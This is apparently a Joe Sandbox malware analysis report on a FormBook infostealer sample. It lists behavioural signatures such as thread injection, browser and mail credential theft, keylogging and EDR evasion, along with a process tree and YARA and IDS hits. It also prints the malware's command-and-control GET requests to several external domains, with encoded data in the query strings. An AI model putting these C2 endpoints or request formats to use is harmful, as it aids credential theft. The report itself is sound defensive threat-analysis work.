Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tfWjjV1LdT.exe

Overview

General Information

Sample name:tfWjjV1LdT.exe
renamed because original name is a hash value
Original sample name:bd2476bf4c51a0a98316cf0efcf28cdda8e6cdad976f22a6a390e57867a7c76c.exe
Analysis ID:1588375
MD5:c3689a08e5e324cde3000e0da0261633
SHA1:f937a0c9e37aeeb64b71799637ce45ed8cd27d1c
SHA256:bd2476bf4c51a0a98316cf0efcf28cdda8e6cdad976f22a6a390e57867a7c76c
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • tfWjjV1LdT.exe (PID: 4852 cmdline: "C:\Users\user\Desktop\tfWjjV1LdT.exe" MD5: C3689A08E5E324CDE3000E0DA0261633)
    • svchost.exe (PID: 892 cmdline: "C:\Users\user\Desktop\tfWjjV1LdT.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • ldZEVEbpOrO.exe (PID: 4444 cmdline: "C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mobsync.exe (PID: 6768 cmdline: "C:\Windows\SysWOW64\mobsync.exe" MD5: F7114D05B442F103BD2D3E20E78A7AA5)
          • ldZEVEbpOrO.exe (PID: 3668 cmdline: "C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6448 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.2308790702.0000000005B70000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.3895579056.0000000002E10000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.3896453631.0000000004A90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000005.00000002.3896511474.0000000004AE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.3896622402.00000000031D0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\tfWjjV1LdT.exe", CommandLine: "C:\Users\user\Desktop\tfWjjV1LdT.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\tfWjjV1LdT.exe", ParentImage: C:\Users\user\Desktop\tfWjjV1LdT.exe, ParentProcessId: 4852, ParentProcessName: tfWjjV1LdT.exe, ProcessCommandLine: "C:\Users\user\Desktop\tfWjjV1LdT.exe", ProcessId: 892, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\tfWjjV1LdT.exe", CommandLine: "C:\Users\user\Desktop\tfWjjV1LdT.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\tfWjjV1LdT.exe", ParentImage: C:\Users\user\Desktop\tfWjjV1LdT.exe, ParentProcessId: 4852, ParentProcessName: tfWjjV1LdT.exe, ProcessCommandLine: "C:\Users\user\Desktop\tfWjjV1LdT.exe", ProcessId: 892, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T01:40:11.996083+010028563181A Network Trojan was detected192.168.2.549954134.0.14.15880TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://www.aballanet.cat/6xrr/?KBEhCJ=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&Kdr=RN-HMNoXj6pXmAvira URL Cloud: Label: malware
                Source: http://www.aballanet.cat/6xrr/Avira URL Cloud: Label: malware
                Source: http://aballanet.cat/6xrr/?KBEhCJ=HxJAUmNG5aAvira URL Cloud: Label: malware
                Source: tfWjjV1LdT.exeVirustotal: Detection: 54%Perma Link
                Source: tfWjjV1LdT.exeReversingLabs: Detection: 55%
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2308790702.0000000005B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3895579056.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3896453631.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3896511474.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3896622402.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2307717085.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2308275736.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: tfWjjV1LdT.exeJoe Sandbox ML: detected
                Source: tfWjjV1LdT.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000002.00000003.2272782502.000000000322B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272687879.000000000322C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272797375.0000000003242000.00000004.00000020.00020000.00000000.sdmp, ldZEVEbpOrO.exe, 00000004.00000002.3896193595.000000000168E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ldZEVEbpOrO.exe, 00000004.00000000.2229278748.000000000090E000.00000002.00000001.01000000.00000005.sdmp, ldZEVEbpOrO.exe, 00000006.00000000.2382349293.000000000090E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: tfWjjV1LdT.exe, 00000000.00000003.2085455684.0000000003590000.00000004.00001000.00020000.00000000.sdmp, tfWjjV1LdT.exe, 00000000.00000003.2085591228.0000000003730000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2212680424.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2307995394.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2307995394.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2210467836.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3896686237.0000000004CF0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3896686237.0000000004E8E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2311789214.0000000004B48000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2309031499.000000000499E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: tfWjjV1LdT.exe, 00000000.00000003.2085455684.0000000003590000.00000004.00001000.00020000.00000000.sdmp, tfWjjV1LdT.exe, 00000000.00000003.2085591228.0000000003730000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2212680424.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2307995394.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2307995394.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2210467836.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3896686237.0000000004CF0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3896686237.0000000004E8E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2311789214.0000000004B48000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2309031499.000000000499E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mobsync.pdb source: svchost.exe, 00000002.00000003.2272782502.000000000322B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272687879.000000000322C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272797375.0000000003242000.00000004.00000020.00020000.00000000.sdmp, ldZEVEbpOrO.exe, 00000004.00000002.3896193595.000000000168E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: mobsync.exe, 00000005.00000002.3895710577.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3897126671.000000000531C000.00000004.10000000.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2613143278.000000002DC3C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: mobsync.exe, 00000005.00000002.3895710577.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3897126671.000000000531C000.00000004.10000000.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2613143278.000000002DC3C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006F445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_006F445A
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006FC6D1 FindFirstFileW,FindClose,0_2_006FC6D1
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_006FC75C
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006FEF95
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006FF0F2
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_006FF3F3
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006F37EF
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006F3B12
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_006FBCBC

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.5:49954 -> 134.0.14.158:80
                Source: DNS query: www.izmirescortg.xyz
                Source: DNS query: www.logidant.xyz
                Source: Joe Sandbox ViewIP Address: 45.141.156.114 45.141.156.114
                Source: Joe Sandbox ViewIP Address: 27.124.4.246 27.124.4.246
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewASN Name: YURTEH-ASUA YURTEH-ASUA
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_007022EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_007022EE
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 00:40:23 GMTserver: Apacheset-cookie: __tad=1736556023.3953434; expires=Tue, 09-Jan-2035 00:40:23 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 00:40:25 GMTserver: Apacheset-cookie: __tad=1736556025.8120462; expires=Tue, 09-Jan-2035 00:40:25 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 00:40:28 GMTserver: Apacheset-cookie: __tad=1736556028.1834882; expires=Tue, 09-Jan-2035 00:40:28 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o
                Source: global trafficHTTP traffic detected: GET /lnl7/?KBEhCJ=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgfVGx56k02tXkAzZldWa3Ro5vlhsr06JocjtffJpgas7XnA==&Kdr=RN-HMNoXj6pXm HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.izmirescortg.xyzUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6xrr/?KBEhCJ=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&Kdr=RN-HMNoXj6pXm HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.aballanet.catUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /0mwe/?Kdr=RN-HMNoXj6pXm&KBEhCJ=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg== HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.madhf.techUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /g3h7/?KBEhCJ=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BXuIfA/6aNcSUPn2xNM4zETNmyU4aFxTXIL5EZw83E41rkQ==&Kdr=RN-HMNoXj6pXm HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.canadavinreport.siteUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
